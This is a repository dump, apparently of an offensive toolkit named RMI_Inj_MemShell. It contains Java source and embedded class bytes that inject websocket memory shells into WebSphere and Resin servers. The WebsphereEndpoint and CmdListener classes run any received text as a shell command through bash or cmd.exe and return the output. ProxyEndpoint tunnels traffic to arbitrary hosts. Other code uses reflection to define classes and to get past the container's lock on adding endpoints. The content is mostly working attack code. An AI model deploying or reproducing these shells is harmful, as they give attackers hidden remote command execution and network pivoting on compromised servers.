116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 59, 1, 0, 8, 
116, 111, 83, 116, 114, 105, 110, 103, 7, 0, 117, 1, 0, 36, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 36, 66, 97, 115, 105, 99, 1, 0, 8, 115, 101, 110, 100, 84, 101, 120, 116, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 1, 0, 17, 97, 100, 100, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 35, 40, 76, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 77, 101, 115, 115, 97, 103, 101, 72, 97, 110, 100, 108, 101, 114, 1, 0, 30, 106, 97, 118, 97, 120, 47, 119, 101, 98, 115, 111, 99, 107, 101, 116, 47, 82, 101, 109, 111, 116, 101, 69, 110, 100, 112, 111, 105, 110, 116, 0, 33, 0, 29, 0, 30, 0, 1, 0, 31, 0, 1, 0, 2, 0, 32, 0, 33, 0, 0, 0, 4, 0, 1, 0, 34, 0, 35, 0, 1, 0, 36, 0, 0, 0, 17, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 0, 0, 1, 0, 37, 0, 38, 0, 1, 0, 36, 0, 0, 0, -88, 0, 5, 0, 7, 0, 0, 0, -108, 18, 2, -72, 0, 3, -74, 0, 4, 18, 5, -74, 0, 6, 62, 29, -103, 0, 31, -72, 0, 7, 6, -67, 0, 8, 89, 3, 18, 9, 83, 89, 4, 18, 10, 83, 89, 5, 43, 83, -74, 0, 11, 77, -89, 0, 28, -72, 0, 7, 6, -67, 0, 8, 89, 3, 18, 12, 83, 89, 4, 18, 13, 83, 89, 5, 43, 83, -74, 0, 11, 77, 44, -74, 0, 14, 58, 4, -69, 0, 15, 89, -73, 0, 16, 58, 5, 25, 4, -74, 0, 17, 89, 54, 6, 2, -97, 0, 15, 25, 5, 21, 6, -110, -74, 0, 18, 87, -89, -1, -21, 25, 4, -74, 0, 19, 44, -74, 0, 20, 87, 42, -76, 0, 21, -71, 0, 22, 1, 0, 25, 5, -74, 0, 23, -71, 0, 24, 2, 0, -89, 0, 8, 77, 44, -74, 0, 26, -79, 0, 1, 0, 0, 0, -117, 0, -114, 0, 25, 0, 0, 0, 1, 0, 39, 0, 40, 0, 1, 0, 36, 0, 0, 0, 25, 0, 2, 0, 3, 0, 0, 0, 13, 42, 43, -75, 0, 21, 43, 42, -71, 0, 27, 2, 0, -79, 0, 0, 0, 0, 16, 65, 0, 37, 0, 41, 0, 1, 0, 36, 0, 0, 0, 21, 0, 2, 0, 2, 0, 0, 0, 9, 42, 43, -64, 0, 8, 
-74, 0, 28, -79, 0, 0, 0, 0, 0, 2, 0, 42, 0, 0, 0, 2, 0, 45, 0, 44, 0, 0, 0, 18, 0, 2, 0, 31, 0, 81, 0, 43, 6, 9, 0, 73, 0, 110, 0, 107, 6, 9}; 32 | Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 33 | method.setAccessible(true); 34 | clazz = (Class) method.invoke(cl, bytes, 0, bytes.length); 35 | ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(clazz, urlPath).build(); 36 | WsServerContainer container = (WsServerContainer) standardContext.getServletContext().getAttribute(ServerContainer.class.getName()); 37 | if (null == container.findMapping(urlPath)) { 38 | try { 39 | container.addEndpoint(configEndpoint); 40 | } catch (DeploymentException e) { 41 | e.printStackTrace(); 42 | } 43 | } 44 | } catch (Exception e) { 45 | e.printStackTrace(); 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /lib/exploit/websocket/WebSphere/ProxyEndpoint$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/WebSphere/ProxyEndpoint$1.class -------------------------------------------------------------------------------- /lib/exploit/websocket/WebSphere/ProxyEndpoint$2.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/WebSphere/ProxyEndpoint$2.class -------------------------------------------------------------------------------- /lib/exploit/websocket/WebSphere/ProxyEndpoint$Attach.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/WebSphere/ProxyEndpoint$Attach.class 
-------------------------------------------------------------------------------- /lib/exploit/websocket/WebSphere/ProxyEndpoint.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/WebSphere/ProxyEndpoint.class -------------------------------------------------------------------------------- /lib/exploit/websocket/WebSphere/ProxyEndpoint.java: -------------------------------------------------------------------------------- 1 | import javax.servlet.ServletContext; 2 | import javax.servlet.http.HttpServletRequest; 3 | import javax.servlet.http.HttpServletResponse; 4 | import javax.websocket.server.ServerEndpointConfig; 5 | import javax.websocket.*; 6 | import java.io.*; 7 | import java.nio.channels.AsynchronousSocketChannel; 8 | import java.util.HashMap; 9 | import java.nio.ByteBuffer; 10 | import java.nio.channels.CompletionHandler; 11 | import java.net.InetSocketAddress; 12 | import java.util.concurrent.TimeUnit; 13 | import java.util.concurrent.Future; 14 | import com.ibm.websphere.wsoc.WsWsocServerContainer; 15 | import java.lang.reflect.Field; 16 | 17 | public class ProxyEndpoint extends Endpoint { 18 | long i =0; 19 | ByteArrayOutputStream baos = new ByteArrayOutputStream(); 20 | HashMap map = new HashMap(); 21 | static class Attach { 22 | public AsynchronousSocketChannel client; 23 | public Session channel; 24 | } 25 | void readFromServer(Session channel,AsynchronousSocketChannel client){ 26 | final ByteBuffer buffer = ByteBuffer.allocate(102400); 27 | Attach attach = new Attach(); 28 | attach.client = client; 29 | attach.channel = channel; 30 | client.read(buffer, attach, new CompletionHandler() { 31 | @Override 32 | public void completed(Integer result, final Attach scAttachment) { 33 | buffer.clear(); 34 | try { 35 | if(buffer.hasRemaining() && result>=0) 36 | { 37 | byte[] arr = new byte[result]; 38 
| ByteBuffer b = buffer.get(arr,0,result); 39 | baos.write(arr,0,result); 40 | ByteBuffer q = ByteBuffer.wrap(baos.toByteArray()); 41 | if (scAttachment.channel.isOpen()) { 42 | scAttachment.channel.getBasicRemote().sendBinary(q); 43 | } 44 | baos = new ByteArrayOutputStream(); 45 | readFromServer(scAttachment.channel,scAttachment.client); 46 | }else{ 47 | if(result > 0) 48 | { 49 | byte[] arr = new byte[result]; 50 | ByteBuffer b = buffer.get(arr,0,result); 51 | baos.write(arr,0,result); 52 | readFromServer(scAttachment.channel,scAttachment.client); 53 | } 54 | } 55 | } catch (Exception ignored) {} 56 | } 57 | @Override 58 | public void failed(Throwable t, Attach scAttachment) {t.printStackTrace();} 59 | }); 60 | } 61 | void process(ByteBuffer z,Session channel) 62 | { 63 | try{ 64 | if(i>1) 65 | { 66 | AsynchronousSocketChannel client = map.get(channel.getId()); 67 | client.write(z).get(); 68 | z.flip(); 69 | z.clear(); 70 | } 71 | else if(i==1) 72 | { 73 | String values = new String(z.array()); 74 | String[] array = values.split(" "); 75 | String[] addrarray = array[1].split(":"); 76 | AsynchronousSocketChannel client = AsynchronousSocketChannel.open(); 77 | int po = Integer.parseInt(addrarray[1]); 78 | InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po); 79 | Future future = client.connect(hostAddress); 80 | try { 81 | future.get(10, TimeUnit.SECONDS); 82 | } catch(Exception ignored){ 83 | channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n"); 84 | return; 85 | } 86 | map.put(channel.getId(), client); 87 | readFromServer(channel,client); 88 | channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n"); 89 | } 90 | }catch(Exception ignored){ 91 | } 92 | } 93 | @Override 94 | public void onOpen(final Session session, EndpointConfig config) { 95 | i=0; 96 | session.setMaxBinaryMessageBufferSize(1024*1024*20); 97 | session.setMaxTextMessageBufferSize(1024*1024*20); 98 | session.addMessageHandler(new 
MessageHandler.Whole() { 99 | @Override 100 | public void onMessage(ByteBuffer message) { 101 | try { 102 | message.clear(); 103 | i++; 104 | process(message,session); 105 | } catch (Exception ignored) { 106 | } 107 | } 108 | }); 109 | } 110 | static { 111 | HttpServletRequest request = null; 112 | HttpServletResponse response = null; 113 | PrintWriter out = null; 114 | try { 115 | out = response.getWriter(); 116 | } catch (IOException e) { 117 | e.printStackTrace(); 118 | } 119 | String path = request.getParameter("path"); 120 | ServletContext servletContext = request.getSession().getServletContext(); 121 | ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(ProxyEndpoint.class, path).build(); 122 | WsWsocServerContainer container = (WsWsocServerContainer) servletContext.getAttribute("javax.websocket.server.ServerContainer"); 123 | Field name = null; 124 | try { 125 | name = container.getClass().getDeclaredField("noMoreAdds"); 126 | name.setAccessible(true); 127 | name.setBoolean(container, false); 128 | try { 129 | if (servletContext.getAttribute(path) == null){ 130 | container.addEndpoint(configEndpoint); 131 | servletContext.setAttribute(path,path); 132 | } 133 | out.println("success, connect url path: " + servletContext.getContextPath() + path); 134 | out.flush(); 135 | out.close(); 136 | } catch (Exception e) { 137 | out.println(e.toString()); 138 | out.flush(); 139 | out.close(); 140 | } 141 | } catch (Exception e) { 142 | out.println(e.toString()); 143 | out.flush(); 144 | out.close(); 145 | } 146 | } 147 | } 148 | -------------------------------------------------------------------------------- /lib/exploit/websocket/WebSphere/WebsphereEndpoint.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/WebSphere/WebsphereEndpoint.class 
-------------------------------------------------------------------------------- /lib/exploit/websocket/WebSphere/WebsphereEndpoint.java: -------------------------------------------------------------------------------- 1 | import com.ibm.websphere.wsoc.WsWsocServerContainer; 2 | import javax.servlet.ServletContext; 3 | import javax.servlet.http.HttpServletRequest; 4 | import javax.servlet.http.HttpServletResponse; 5 | import javax.websocket.server.ServerEndpointConfig; 6 | import javax.websocket.*; 7 | import java.io.*; 8 | import java.lang.reflect.Field; 9 | 10 | public class WebsphereEndpoint extends Endpoint implements MessageHandler.Whole { 11 | private Session session; 12 | 13 | @Override 14 | public void onMessage(String s) { 15 | try { 16 | Process process; 17 | boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows"); 18 | if (bool) { 19 | process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s }); 20 | } else { 21 | process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s }); 22 | } 23 | InputStream inputStream = process.getInputStream(); 24 | StringBuilder stringBuilder = new StringBuilder(); 25 | int i; 26 | while ((i = inputStream.read()) != -1) 27 | stringBuilder.append((char)i); 28 | inputStream.close(); 29 | process.waitFor(); 30 | session.getBasicRemote().sendText(stringBuilder.toString()); 31 | } catch (Exception exception) { 32 | exception.printStackTrace(); 33 | } 34 | } 35 | @Override 36 | public void onOpen(final Session session, EndpointConfig config) { 37 | this.session = session; 38 | session.addMessageHandler(this); 39 | } 40 | 41 | static { 42 | HttpServletRequest request =null; 43 | HttpServletResponse response = null; 44 | PrintWriter out = null; 45 | try { 46 | out = response.getWriter(); 47 | } catch (IOException e) { 48 | e.printStackTrace(); 49 | } 50 | String path = request.getParameter("path"); 51 | ServletContext servletContext = request.getSession().getServletContext(); 52 | 
ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(WebsphereEndpoint.class, path).build(); 53 | WsWsocServerContainer container = (WsWsocServerContainer) servletContext.getAttribute("javax.websocket.server.ServerContainer"); 54 | Field name = null; 55 | try { 56 | name = container.getClass().getDeclaredField("noMoreAdds"); 57 | name.setAccessible(true); 58 | name.setBoolean(container, false); 59 | try { 60 | if (servletContext.getAttribute(path) == null){ 61 | container.addEndpoint(configEndpoint); 62 | servletContext.setAttribute(path,path); 63 | } 64 | out.println("success, connect url path: " + servletContext.getContextPath() + path); 65 | out.flush(); 66 | out.close(); 67 | } catch (Exception e) { 68 | out.println(e.toString()); 69 | out.flush(); 70 | out.close(); 71 | } 72 | } catch (Exception e) { 73 | out.println(e.toString()); 74 | out.flush(); 75 | out.close(); 76 | } 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /lib/exploit/websocket/resin/CmdListener.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/websocket/resin/CmdListener.class -------------------------------------------------------------------------------- /lib/exploit/websocket/resin/CmdListener.java: -------------------------------------------------------------------------------- 1 | import com.caucho.websocket.WebSocketListener; 2 | import com.caucho.websocket.WebSocketServletRequest; 3 | import com.caucho.websocket.WebSocketContext; 4 | import javax.servlet.http.HttpServletRequest; 5 | import javax.servlet.http.HttpServletResponse; 6 | import java.io.IOException; 7 | import java.io.InputStream; 8 | import java.io.Reader; 9 | import java.io.PrintWriter; 10 | 11 | public class CmdListener implements WebSocketListener { 12 | static { 13 | HttpServletRequest request = 
null; 14 | HttpServletResponse response=null; 15 | String protocol=request.getHeader("Upgrade"); 16 | if(!"websocket".equals(protocol)){ 17 | PrintWriter out = null; 18 | try { 19 | out = response.getWriter(); 20 | out.println("not websocket"); 21 | out.flush(); 22 | out.close(); 23 | } catch (IOException e) { 24 | e.printStackTrace(); 25 | } 26 | } 27 | WebSocketListener listener=new CmdListener(); 28 | WebSocketServletRequest wsReq=(WebSocketServletRequest)request; 29 | try { 30 | wsReq.startWebSocket(listener); 31 | } catch (IOException e) { 32 | e.printStackTrace(); 33 | } 34 | } 35 | public void onReadText(WebSocketContext context, Reader is) throws IOException { 36 | StringBuilder sb = new StringBuilder(); 37 | int ch; 38 | while ((ch = is.read()) >= 0) { 39 | sb.append((char) ch); 40 | } 41 | try { 42 | Process process; 43 | boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows"); 44 | if (bool) { 45 | process = Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", sb.toString()}); 46 | } else { 47 | process = Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", sb.toString()}); 48 | } 49 | InputStream inputStream = process.getInputStream(); 50 | StringBuilder stringBuilder = new StringBuilder(); 51 | int i; 52 | while ((i = inputStream.read()) != -1) 53 | stringBuilder.append((char) i); 54 | inputStream.close(); 55 | process.waitFor(); 56 | PrintWriter writer = context.startTextMessage(); 57 | writer.print(stringBuilder); 58 | writer.close(); 59 | } catch (Exception ignored) { 60 | } 61 | } 62 | 63 | public void onStart(WebSocketContext context) throws IOException { 64 | } 65 | 66 | public void onReadBinary(WebSocketContext context, InputStream is) throws IOException { 67 | } 68 | 69 | public void onClose(WebSocketContext context) throws IOException { 70 | } 71 | 72 | public void onDisconnect(WebSocketContext context) throws IOException { 73 | } 74 | 75 | public void onTimeout(WebSocketContext context) throws IOException { 76 
| } 77 | } 78 | -------------------------------------------------------------------------------- /lib/web/web.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/web/web.jar --------------------------------------------------------------------------------